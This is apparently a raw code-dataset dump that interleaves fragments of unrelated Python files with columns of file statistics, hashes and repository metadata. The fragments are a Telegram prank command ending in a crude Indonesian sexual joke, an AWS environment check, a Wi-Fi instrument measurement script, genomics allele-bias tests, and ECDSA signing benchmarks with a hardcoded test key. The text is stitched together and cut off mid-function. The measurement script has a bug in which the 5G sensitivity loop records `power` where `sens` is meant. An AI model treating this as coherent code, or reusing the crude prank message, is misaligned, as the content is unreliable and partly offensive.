number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████████▌")
sleep(1)
await typew.edit(
"`Bool Sudah Tertusuk Hahahaha Selamat Bool Anda Sudah Tidak Perawan`"
)
CMD_HELP.update(
{
"santet": "`.santet`\
\nUsage: Canda Bool."
}
)
| 29.951515
| 78
| 0.490996
| 1,288
| 9,884
| 4.45264
| 0.118012
| 0.18483
| 0.258762
| 0.296425
| 0.783435
| 0.765475
| 0.765475
| 0.765475
| 0.765475
| 0.765475
| 0
| 0.055847
| 0.26811
| 9,884
| 329
| 79
| 30.042553
| 0.614598
| 0
| 0
| 0.62963
| 0
| 0
| 0.151963
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009259
| 0
| 0.009259
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c452b1ea9d189c19299de37f7eaab4fc51b3c640
| 83
|
py
|
Python
|
xoto3/utils/env.py
|
xoeye/xoto3
|
ef91cde3cce81e1ded311389358271d5c8eba02b
|
[
"MIT"
] | 16
|
2020-05-23T15:23:38.000Z
|
2022-03-18T19:28:37.000Z
|
xoto3/utils/env.py
|
xoeye/xoto3
|
ef91cde3cce81e1ded311389358271d5c8eba02b
|
[
"MIT"
] | 9
|
2020-08-19T23:08:36.000Z
|
2021-10-06T17:16:35.000Z
|
xoto3/utils/env.py
|
xoeye/xoto3
|
ef91cde3cce81e1ded311389358271d5c8eba02b
|
[
"MIT"
] | 2
|
2020-12-12T08:23:53.000Z
|
2021-09-03T20:25:54.000Z
|
import os
def is_aws_env() -> bool:
return "AWS_EXECUTION_ENV" in os.environ
| 13.833333
| 44
| 0.710843
| 14
| 83
| 3.928571
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192771
| 83
| 5
| 45
| 16.6
| 0.820896
| 0
| 0
| 0
| 0
| 0
| 0.204819
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c46bd91f5613b1afefdb1e03f00332e62a31b433
| 7,206
|
py
|
Python
|
Source_Code/Python/conducted_script_testing.py
|
fenglwh/instruments
|
7886158d1ed97fe6bfe372a55f4fca107e834311
|
[
"MIT"
] | null | null | null |
Source_Code/Python/conducted_script_testing.py
|
fenglwh/instruments
|
7886158d1ed97fe6bfe372a55f4fca107e834311
|
[
"MIT"
] | 3
|
2018-09-21T00:57:21.000Z
|
2018-09-21T01:49:40.000Z
|
Source_Code/Python/conducted_script_testing.py
|
fenglwh/instruments
|
7886158d1ed97fe6bfe372a55f4fca107e834311
|
[
"MIT"
] | null | null | null |
import time
from labinstrument.SS.CMW500.CMW500_WIFI.CMW500_WIFI import CMW_WIFI
import openpyxl
if __name__ == '__main__':
instrument=CMW_WIFI(17)
print(instrument.uddrate_mode)
print(instrument.DSSS_rate)
print(instrument.OFDM_rate)
print(instrument.OMCS_rate)
instrument.tx_modulation_format='DSSS'
tech_2g_power=1
tech_5g_power=0
tech_2g_sensitivity=0
tech_5g_sensitivity=0
if tech_2g_power:
wb=openpyxl.Workbook()
ws=wb.worksheets[0]
row_count=1
for standard in ['BSTD','GSTD','GNST']:
for channel in [1,6,13]:
instrument.signal_off()
instrument.standard = standard
instrument.channel = channel
if standard=='BSTD':
instrument.tx_modulation_format='DSSS'
instrument.uddrate_mode='True'
instrument.DSSS_rate='DIS,DIS,DIS,MAND'
instrument.MFR_control_rate='ENAB,NHT,C11M'
instrument.DFR_control_rate='ENAB,NHT,BW20,C11M,LONG'
instrument.write('CONFigure:WLAN:MEAS:ISIGnal:STANdard DSSS')
elif standard=='GSTD':
instrument.tx_modulation_format='OFDM'
instrument.uddrate_mode='True'
instrument.DSSS_rate='DIS,DIS,DIS,DIS'
instrument.OFDM_rate='MAND,DIS,DIS,DIS,DIS,DIS,DIS,DIS'
instrument.MFR_control_rate='ENAB,NHT,BR12'
instrument.DFR_control_rate='ENAB,NHT,BW20,BR12,LONG'
instrument.write('CONFigure:WLAN:MEAS:ISIGnal:STANdard LOFD')
elif standard=='GNST':
instrument.tx_modulation_format = 'OFDM'
instrument.uddrate_mode = 'True'
instrument.DSSS_rate = 'DIS,DIS,DIS,DIS'
instrument.OFDM_rate = 'OPT,DIS,DIS,DIS,DIS,DIS,DIS,DIS'
instrument.OMCS_rate ='SUPP,NOTS,NOTS,NOTS,NOTS,NOTS,NOTS,NOTS'
instrument.MFR_control_rate='ENAB,HTM,MCS'
instrument.DFR_control_rate='ENAB,HTM,BW20,MCS,LONG'
instrument.write('CONFigure:WLAN:MEAS:ISIGnal:STANdard HTOF')
instrument.signal_on()
instrument.packet_generator_ON()
instrument.wait_for_connect()
for x in range(3):
power=instrument.meas_tx_ping()
if power!='NACK':
break
print("{} | {} | {}".format(standard,channel,power))
ws.cell(row=row_count,column=1).value=str(standard)
ws.cell(row=row_count,column=2).value=str(channel)
ws.cell(row=row_count,column=3).value=str(power)
row_count+=1
wb.save('2G_power.xlsx')
wb.close()
#5g
if tech_5g_power:
wb = openpyxl.Workbook()
ws = wb.worksheets[0]
row_count = 1
for standard in ['ASTD', 'ANST']:
for channel in [36,44,48,52,60,64,100,120,140,149,157,161,165]:
instrument.signal_off()
instrument.standard = standard
instrument.channel = channel
if standard=='ASTD':
instrument.tx_modulation_format = 'OFDM'
instrument.uddrate_mode = 'True'
instrument.DSSS_rate = 'DIS,DIS,DIS,DIS'
instrument.OFDM_rate = 'MAND,DIS,DIS,DIS,DIS,DIS,DIS,DIS'
instrument.MFR_control_rate = 'ENAB,NHT,BR12'
instrument.DFR_control_rate = 'ENAB,NHT,BW20,BR12,LONG'
instrument.write('CONFigure:WLAN:MEAS:ISIGnal:STANdard LOFD')
elif standard=='ANST':
instrument.tx_modulation_format = 'OFDM'
instrument.uddrate_mode = 'True'
instrument.DSSS_rate = 'DIS,DIS,DIS,DIS'
instrument.OFDM_rate = 'OPT,DIS,DIS,DIS,DIS,DIS,DIS,DIS'
instrument.OMCS_rate = 'SUPP,NOTS,NOTS,NOTS,NOTS,NOTS,NOTS,NOTS'
instrument.MFR_control_rate = 'ENAB,HTM,MCS'
instrument.DFR_control_rate = 'ENAB,HTM,BW20,MCS,LONG'
instrument.write('CONFigure:WLAN:MEAS:ISIGnal:STANdard HTOF')
instrument.signal_on()
instrument.packet_generator_ON()
instrument.wait_for_connect()
for x in range(3):
power=instrument.meas_tx_ping()
if power!='NACK':
break
print("{} | {} | {}".format(standard, channel,power ))
ws.cell(row=row_count,column=1).value=str(standard)
ws.cell(row=row_count,column=2).value=str(channel)
ws.cell(row=row_count,column=3).value=str(power)
row_count+=1
wb.save('5G_power.xlsx')
wb.close()
if tech_2g_sensitivity:
wb = openpyxl.Workbook()
ws = wb.worksheets[0]
row_count = 1
for channel in [1, 6, 13]:
instrument.signal_off()
instrument.standard = 'GNST'
instrument.uddrate_mode = 'False'
instrument.channel=channel
instrument.signal_on()
instrument.wait_for_connect()
for dl_rate in ['NHT,BW20,C11M,LONG','NHT,BW20,BR12,LONG','NHT,BW20,Q6M34,LONG','HTM,BW20,MCS,LONG','HTM,BW20,MCS7,LONG']:
instrument.write('CONFigure:WLAN:SIGN1:PER:FDEF {}'.format(dl_rate))
time.sleep(0.2)
sens=instrument.meas_rx_sensitivity()
print("{} | {} | {}".format(dl_rate, channel, sens))
ws.cell(row=row_count, column=1).value = str(dl_rate)
ws.cell(row=row_count, column=2).value = str(channel)
ws.cell(row=row_count, column=3).value = str(sens)
row_count += 1
wb.save('2G_sensitivity.xlsx')
wb.close()
if tech_5g_sensitivity:
wb = openpyxl.Workbook()
ws = wb.worksheets[0]
row_count = 1
for channel in [36, 44, 48, 52, 60, 64, 100, 120, 140, 149, 157, 161, 165]:
instrument.signal_off()
instrument.standard = 'GNST'
instrument.uddrate_mode = 'False'
instrument.channel = channel
instrument.signal_on()
instrument.wait_for_connect()
for dl_rate in ['NHT,BW20,BR12,LONG', 'NHT,BW20,Q6M34,LONG', 'HTM,BW20,MCS,LONG',
'HTM,BW20,MCS7,LONG']:
instrument.write('CONFigure:WLAN:SIGN1:PER:FDEF {}'.format(dl_rate))
time.sleep(0.2)
sens = instrument.meas_rx_sensitivity()
print("{} | {} | {}".format(dl_rate, channel, sens))
ws.cell(row=row_count, column=1).value = str(dl_rate)
ws.cell(row=row_count, column=2).value = str(channel)
ws.cell(row=row_count, column=3).value = str(power)
row_count += 1
wb.save('5G_sensitivity.xlsx')
wb.close()
| 45.898089
| 134
| 0.552179
| 826
| 7,206
| 4.645278
| 0.141646
| 0.059421
| 0.068022
| 0.062549
| 0.890018
| 0.864477
| 0.851446
| 0.842325
| 0.829033
| 0.829033
| 0
| 0.039004
| 0.331113
| 7,206
| 156
| 135
| 46.192308
| 0.757054
| 0.000278
| 0
| 0.753425
| 0
| 0
| 0.155074
| 0.077051
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.020548
| 0
| 0.020548
| 0.054795
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c47285f51b0eebea9f23fe5c6d51ad715495595f
| 18,907
|
py
|
Python
|
test/wecall_acceptance/single_sample_diploid/test_allele_bias.py
|
dylex/wecall
|
35d24cefa4fba549e737cd99329ae1b17dd0156b
|
[
"MIT"
] | 8
|
2018-10-08T15:47:21.000Z
|
2021-11-09T07:13:05.000Z
|
test/wecall_acceptance/single_sample_diploid/test_allele_bias.py
|
dylex/wecall
|
35d24cefa4fba549e737cd99329ae1b17dd0156b
|
[
"MIT"
] | 4
|
2018-11-05T09:16:27.000Z
|
2020-04-09T12:32:56.000Z
|
test/wecall_acceptance/single_sample_diploid/test_allele_bias.py
|
dylex/wecall
|
35d24cefa4fba549e737cd99329ae1b17dd0156b
|
[
"MIT"
] | 4
|
2019-09-03T15:46:39.000Z
|
2021-06-04T07:28:33.000Z
|
# All content Copyright (C) 2018 Genomics plc
from wecall.genomics.variant import Variant
from wecall_test_drivers.ascii_wecall_runner import AsciiWecallRunnerTest
from wecall_test_drivers.base_test import BaseTest
from wecall_test_drivers.svc_driver import SVCDriver
class TestAlleleBiasPValue(BaseTest):
def test_should_get_unknown_value_for_homozygous_alt_call(self):
driver = SVCDriver(self)
driver.with_ref_sequence(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT", chrom="1"
).with_read(
".....................T....................", chrom="1"
).with_read(
".....................T....................", chrom="1"
)
vcf_expect = driver.call().with_output_vcf()
vcf_expect.has_record_for_variant(Variant("1", 21, "A", "T")) \
.with_info().with_field("ABPV", [None])
def test_should_get_unknown_value_for_het_call_with_majority_support(self):
driver = SVCDriver(self)
driver.with_ref_sequence(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT", chrom="1"
).with_read(
"..........................................", chrom="1"
).with_read(
".....................T....................", chrom="1"
).with_read(
".....................T....................", chrom="1"
)
vcf_expect = driver.call().with_output_vcf()
vcf_expect.has_record_for_variant(Variant("1", 21, "A", "T")) \
.with_info().with_field("ABPV", [None])
class TestAlleleBiasFilterWithDefaultThreshold(AsciiWecallRunnerTest):
def test_does_not_filter_homozygous_snp(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT",
[" ..............T............. ",
" ...................T........ ",
" .................T.............. ",
" .................T.................. ",
" .................T.................. ",
" .................T.................. ",
" .................T.................. ",
".....................T...... "],
[(21, "A", "T", {"DP": [8], "AD": [0, 8]}, ["PASS"])]
)
def test_does_not_filter_balanced_heterozygous_snp(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" .................................... ",
" .................T.................. ",
" .................T.................. ",
" .................T.................. ",
".....................T...... "],
[(21, "A", "T", {"DP": [8], "AD": [4, 4]}, ["PASS"])]
)
def test_does_not_filter_2_out_of_8_heterozygous_snp(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" .................................... ",
" .................................... ",
" .................................... ",
" .................T.................. ",
".....................T...... "],
[(21, "A", "T", {"DP": [8], "AD": [6, 2]}, ["PASS"])]
)
def test_does_not_filter_2_out_of_10_heterozygous_snp(self):
chrom = '14'
sample = 'SAMPLE'
driver = SVCDriver(self)
driver.with_ref_sequence(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT", chrom=chrom
).with_read(
" ................................ ", n_fwd=4, n_rev=4, chrom=chrom, sample_name=sample
).with_read(
" .................T.................. ", n_fwd=1, n_rev=1, chrom=chrom, sample_name=sample)
vcf = driver.call().with_output_vcf()
vcf \
.has_record_for_variant(Variant(chrom, 21, 'A', 'T')) \
.with_filters(set()) \
.with_sample(sample) \
.has_read_depth(10) \
.has_allelic_read_support(8, 2)
def test_does_not_filter_2_out_of_12_heterozygous_snp(self):
chrom = '14'
sample = 'SAMPLE'
driver = SVCDriver(self)
driver.with_ref_sequence(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT", chrom=chrom
).with_read(
" ................................ ", n_fwd=5, n_rev=5, chrom=chrom, sample_name=sample
).with_read(
" .................T.................. ", n_fwd=1, n_rev=1, chrom=chrom, sample_name=sample)
vcf = driver.call().with_output_vcf()
vcf \
.has_record_for_variant(Variant(chrom, 21, 'A', 'T')) \
.with_filters(set()) \
.with_sample(sample) \
.has_read_depth(12) \
.has_allelic_read_support(10, 2)
def test_does_filter_2_out_of_15_heterozygous_snp(self):
self.calls_variants_with_sample_data_and_filters(
"AAGTACACATACGCACGCGCCAGCACGTGAATTGATCTTGTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" .................................... ",
" .................................... ",
" .................................... ",
" .................T.................. ",
".....................T...... "],
[] # We don't call this because the variant coverage is too low
)
def test_does_not_filter_5_out_of_40_heterozygous_snp(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" .................T.................. ",
" .................T.................. ",
" .................T.................. ",
" .................T.................. ",
".....................T...... "],
[(21, "A", "T", {"DP": [40], "AD": [35, 5]}, ["AB"])],
config_dict={"varFilterIDs": "AB"}
)
class TestAlleleBiasFilterWithNonDefaultThresholds(AsciiWecallRunnerTest):
def test_filters_2_out_ot_12_heterozygous_snp(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" .................................... ",
" .................................... ",
" .................................... ",
" .................T.................. ",
".....................T...... "],
[(21, "A", "T", {"DP": [12], "AD": [10, 2]}, ["AB"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_does_not_filter_3_out_ot_12_heterozygous_snp(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" .................................... ",
" .................................... ",
" .................T.................. ",
" .................T.................. ",
".....................T...... "],
[(21, "A", "T", {"DP": [12], "AD": [9, 3]}, ["PASS"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_filters_2_out_ot_12_heterozygous_insertion(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCC**TAAAAAAAATTTTTTTTTTT",
[" .............**............. ",
" ..................**........ ",
" ................**.............. ",
" ................**.............. ",
" ................**.............. ",
" ................**.............. ",
" ................**.............. ",
" ................**.................. ",
" ................**.................. ",
" ................**.................. ",
" ................TT.................. ",
"....................TT...... "],
[(19, "C", "CTT", {"DP": [12], "AD": [10, 2]}, ["AB"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_does_not_filter_3_out_ot_12_heterozygous_insertion(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCC**TAAAAAAAATTTTTTTTTTT",
[" .............**............. ",
" ..................**........ ",
" ................**.............. ",
" ................**.............. ",
" ................**.............. ",
" ................**.............. ",
" ................**.............. ",
" ................**.................. ",
" ................**.................. ",
" ................TT.................. ",
" ................TT.................. ",
"....................TT...... "],
[(19, "C", "CTT", {"DP": [12], "AD": [9, 3]}, ["PASS"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_filters_2_out_ot_12_heterozygous_deletion(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCGTTAAAAAAAATTTTTTTTTTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" .................................... ",
" .................................... ",
" .................................... ",
" ................**.................. ",
"....................**...... "],
[(19, "CGT", "C", {"DP": [12], "AD": [10, 2]}, ["AB"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_does_not_filter_3_out_ot_12_heterozygous_deletion(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCGTTAAAAAAAATTTTTTTTTTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" .................................... ",
" .................................... ",
" ................**.................. ",
" ................**.................. ",
"....................**...... "],
[(19, "CGT", "C", {"DP": [12], "AD": [9, 3]}, ["PASS"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_filters_3_out_ot_18_heterozygous_insertion_in_A4_homopolymer(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCC**AAAAGCCGTTTTTTTTTTT",
[" .............**............ ",
" ..................**............... ",
" ................**............. ",
" ................**............. ",
" ................**............. ",
" ................**............. ",
" ................**............. ",
" ................**................. ",
" ................**................. ",
" ................**................. ",
" ................**............. ",
" ................**............. ",
" ................**................. ",
" ................**................. ",
" ................**................. ",
" ................AA................. ",
" ................AA................. ",
"....................AA..... "],
[(19, "C", "CAA", {"DP": [18], "AD": [15, 3]}, ["AB"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_does_not_filter_3_out_ot_12_heterozygous_insertion_in_A4_homopolymer(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCC**AAAAGCCGTTTTTTTTTTT",
[" .............**............ ",
" ..................**....... ",
" ................**............. ",
" ................**............. ",
" ................**............. ",
" ................**............. ",
" ................**............. ",
" ................**................. ",
" ................**................. ",
" ................AA................. ",
" ................AA................. ",
"....................AA..... "],
[(19, "C", "CAA", {"DP": [12], "AD": [9, 3]}, ["PASS"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_does_not_filter_3_out_ot_12_heterozygous_insertion_in_A4_homopolymer_when_some_variants_need_left_aligning(
self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCC**AAAA**GCCGTTTTTTTTTTT",
[" .............**....**........ ",
" ..................**....**... ",
" ................**....**......... ",
" ................**....**......... ",
" ................**....**......... ",
" ................**....**......... ",
" ................**....**......... ",
" ................**....**............. ",
" ................**....**............. ",
" ................**....AA............. ",
" ................AA....**............. ",
"....................AA.... "],
[(19, "C", "CAA", {"DP": [12], "AD": [9, 3]}, ["PASS"])],
config_dict={"minAlleleBiasP": "0.04"}
)
| 50.553476
| 120
| 0.238695
| 850
| 18,907
| 4.914118
| 0.158824
| 0.009097
| 0.043572
| 0.070385
| 0.819727
| 0.810151
| 0.804405
| 0.789562
| 0.774719
| 0.758918
| 0
| 0.01532
| 0.333686
| 18,907
| 373
| 121
| 50.689008
| 0.316241
| 0.005395
| 0
| 0.782991
| 0
| 0
| 0.509095
| 0.390171
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052786
| false
| 0.02346
| 0.01173
| 0
| 0.073314
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
671b6f7c748a849f8f8b2bf9fabc9c8088ed2f5d
| 7,044
|
py
|
Python
|
benchmarks/benchmarks/bench_ecdsa.py
|
TheCrazyGM/bhive
|
1494e90a99123ecfc5efbd927258f9ba59443e2e
|
[
"MIT"
] | 2
|
2020-03-21T23:50:22.000Z
|
2020-03-25T19:10:48.000Z
|
benchmarks/benchmarks/bench_ecdsa.py
|
TheCrazyGM/bhive
|
1494e90a99123ecfc5efbd927258f9ba59443e2e
|
[
"MIT"
] | null | null | null |
benchmarks/benchmarks/bench_ecdsa.py
|
TheCrazyGM/bhive
|
1494e90a99123ecfc5efbd927258f9ba59443e2e
|
[
"MIT"
] | 1
|
2020-03-21T23:50:25.000Z
|
2020-03-21T23:50:25.000Z
|
# This Python file uses the following encoding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import hashlib
import ecdsa
from binascii import hexlify, unhexlify
from bhivegraphenebase.account import PrivateKey, PublicKey, Address
import bhivegraphenebase.ecdsasig as ecda
from bhivegraphenebase.py23 import py23_bytes
class Benchmark(object):
goal_time = 10
class ECDSA(Benchmark):
def setup(self):
ecda.SECP256K1_MODULE = "ecdsa"
def time_sign(self):
wif = "5J4KCbg1G3my9b9hCaQXnHSm6vrwW9xQTJS6ZciW2Kek7cCkCEk"
message = '576b2c99564392ed50e36c80654224953fdf8b5259528a1a4342c19be2da9b133c44429ac2be4d5dd588ec28e97015c34db80b7e8d8915e023c2501acd3eafe0'
signature = ecda.sign_message(message, wif)
message = 'foo'
signature = ecda.sign_message(message, wif)
message = 'This is a short Message'
signature = ecda.sign_message(message, wif)
message = '1234567890'
signature = ecda.sign_message(message, wif)
def time_verify(self):
message = '576b2c99564392ed50e36c80654224953fdf8b5259528a1a4342c19be2da9b133c44429ac2be4d5dd588ec28e97015c34db80b7e8d8915e023c2501acd3eafe0'
signature = b' S\xef\x14x\x06\xeb\xba\xc5\xf9\x0e\xac\x02pL\xbeLO;\x1d"$\xd7\xfc\x07\xfb\x9c\x08\xc5b^\x1e\xec\x19\xb1y\x11\np\xec(\xc9\xf3\xfd\x1f~\xe3\x99\xe8\xc98]\xd3\x951m${\x82\x0f[(\xa9\x90#'
pubkey = ecda.verify_message(message, signature)
signature = b' W\x83\xe5w\x8f\x07\x19EV\xba\x9d\x90\x9f\xfd \x81&\x0f\xa1L\xa00zK0\x08\xf78/\x9d\x0c\x06JFx[*Z\xfe\xd1F\x8d\x9f \x19\xad\xd9\xc9\xbf\xd3\x1br\xdd\x8e\x8ei\xf8\xd2\xf40\xad\xc6\x9c\xe5'
message = 'foo'
pubkey = ecda.verify_message(message, signature)
signature = b'\x1f9\xb6_\x85\xbdr7\\\xb2N\xfb~\x82\xb7E\x80\xf1M\xa4EP=\x8elJ\x1d[t\xab%v~a\xb7\xdbS\x86;~N\xd2!\xf1k=\xb6tMm-\xf1\xd9\xfc\xf3`\xbf\xd5)\x1b\xb3N\x92u/'
message = 'This is a short Message'
pubkey = ecda.verify_message(message, signature)
message = '1234567890'
signature = b' 7\x82\xe2\xad\xdc\xdb]~\xd6\xa8J\xdc\xa5\xf4\x13<i\xb9\xc0\xdcEc\x10\xd0)t\xc7^\xecw\x05 U\x91\x0f\xa2\xce\x04\xa1\xdb\xb0\nQ\xbd\xafP`\\\x8bb\x99\xcf\xe0;\x01*\xe9D]\xad\xd9l\x1f\x05'
pubkey = ecda.verify_message(message, signature)
class Cryptography(Benchmark):
def setup(self):
try:
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.asymmetric.utils \
import decode_dss_signature, encode_dss_signature
from cryptography.exceptions import InvalidSignature
ecda.SECP256K1_MODULE = "cryptography"
except ImportError:
raise NotImplementedError("cryptography not available")
def time_sign(self):
wif = "5J4KCbg1G3my9b9hCaQXnHSm6vrwW9xQTJS6ZciW2Kek7cCkCEk"
message = '576b2c99564392ed50e36c80654224953fdf8b5259528a1a4342c19be2da9b133c44429ac2be4d5dd588ec28e97015c34db80b7e8d8915e023c2501acd3eafe0'
signature = ecda.sign_message(message, wif)
message = 'foo'
signature = ecda.sign_message(message, wif)
message = 'This is a short Message'
signature = ecda.sign_message(message, wif)
message = '1234567890'
signature = ecda.sign_message(message, wif)
def time_verify(self):
message = '576b2c99564392ed50e36c80654224953fdf8b5259528a1a4342c19be2da9b133c44429ac2be4d5dd588ec28e97015c34db80b7e8d8915e023c2501acd3eafe0'
signature = b' S\xef\x14x\x06\xeb\xba\xc5\xf9\x0e\xac\x02pL\xbeLO;\x1d"$\xd7\xfc\x07\xfb\x9c\x08\xc5b^\x1e\xec\x19\xb1y\x11\np\xec(\xc9\xf3\xfd\x1f~\xe3\x99\xe8\xc98]\xd3\x951m${\x82\x0f[(\xa9\x90#'
pubkey = ecda.verify_message(message, signature)
signature = b' W\x83\xe5w\x8f\x07\x19EV\xba\x9d\x90\x9f\xfd \x81&\x0f\xa1L\xa00zK0\x08\xf78/\x9d\x0c\x06JFx[*Z\xfe\xd1F\x8d\x9f \x19\xad\xd9\xc9\xbf\xd3\x1br\xdd\x8e\x8ei\xf8\xd2\xf40\xad\xc6\x9c\xe5'
message = 'foo'
pubkey = ecda.verify_message(message, signature)
signature = b'\x1f9\xb6_\x85\xbdr7\\\xb2N\xfb~\x82\xb7E\x80\xf1M\xa4EP=\x8elJ\x1d[t\xab%v~a\xb7\xdbS\x86;~N\xd2!\xf1k=\xb6tMm-\xf1\xd9\xfc\xf3`\xbf\xd5)\x1b\xb3N\x92u/'
message = 'This is a short Message'
pubkey = ecda.verify_message(message, signature)
message = '1234567890'
signature = b' 7\x82\xe2\xad\xdc\xdb]~\xd6\xa8J\xdc\xa5\xf4\x13<i\xb9\xc0\xdcEc\x10\xd0)t\xc7^\xecw\x05 U\x91\x0f\xa2\xce\x04\xa1\xdb\xb0\nQ\xbd\xafP`\\\x8bb\x99\xcf\xe0;\x01*\xe9D]\xad\xd9l\x1f\x05'
pubkey = ecda.verify_message(message, signature)
class Secp256k1(Benchmark):
def setup(self):
try:
import secp256k1
ecda.SECP256K1_MODULE = "secp256k1"
except ImportError:
raise NotImplementedError("secp256k1 not available")
def time_sign(self):
wif = "5J4KCbg1G3my9b9hCaQXnHSm6vrwW9xQTJS6ZciW2Kek7cCkCEk"
message = '576b2c99564392ed50e36c80654224953fdf8b5259528a1a4342c19be2da9b133c44429ac2be4d5dd588ec28e97015c34db80b7e8d8915e023c2501acd3eafe0'
signature = ecda.sign_message(message, wif)
message = 'foo'
signature = ecda.sign_message(message, wif)
message = 'This is a short Message'
signature = ecda.sign_message(message, wif)
message = '1234567890'
signature = ecda.sign_message(message, wif)
def time_verify(self):
message = '576b2c99564392ed50e36c80654224953fdf8b5259528a1a4342c19be2da9b133c44429ac2be4d5dd588ec28e97015c34db80b7e8d8915e023c2501acd3eafe0'
signature = b' S\xef\x14x\x06\xeb\xba\xc5\xf9\x0e\xac\x02pL\xbeLO;\x1d"$\xd7\xfc\x07\xfb\x9c\x08\xc5b^\x1e\xec\x19\xb1y\x11\np\xec(\xc9\xf3\xfd\x1f~\xe3\x99\xe8\xc98]\xd3\x951m${\x82\x0f[(\xa9\x90#'
pubkey = ecda.verify_message(message, signature)
